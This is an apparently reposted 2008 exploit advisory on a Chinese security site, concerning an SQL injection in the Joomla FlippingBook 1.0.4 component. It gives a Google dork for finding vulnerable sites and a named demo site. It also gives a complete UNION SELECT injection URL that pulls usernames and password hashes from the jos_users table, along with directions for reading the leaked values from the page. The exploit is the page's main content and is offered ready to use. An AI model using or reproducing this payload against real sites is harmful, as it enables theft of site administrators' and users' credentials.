首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability


http://www.gipsky.com/
[ A L G E R I A S E C U R I T Y C R E W ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~] Version() : 1.0.4
###########################################
#
# DORK 1 : inurl:com_flippingbook
#
###########################################
[ ]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook

[ ]Exploit :

/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[ ] : you can see the password in 'Title'
[ ] : Open the source page to see the 'password'
###########################################

[2008-04-22]
<< TR News 2.1 (nb) Remote SQL Injection Vulnerability Web Calendar <= 4.1 Blind SQL Injection Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号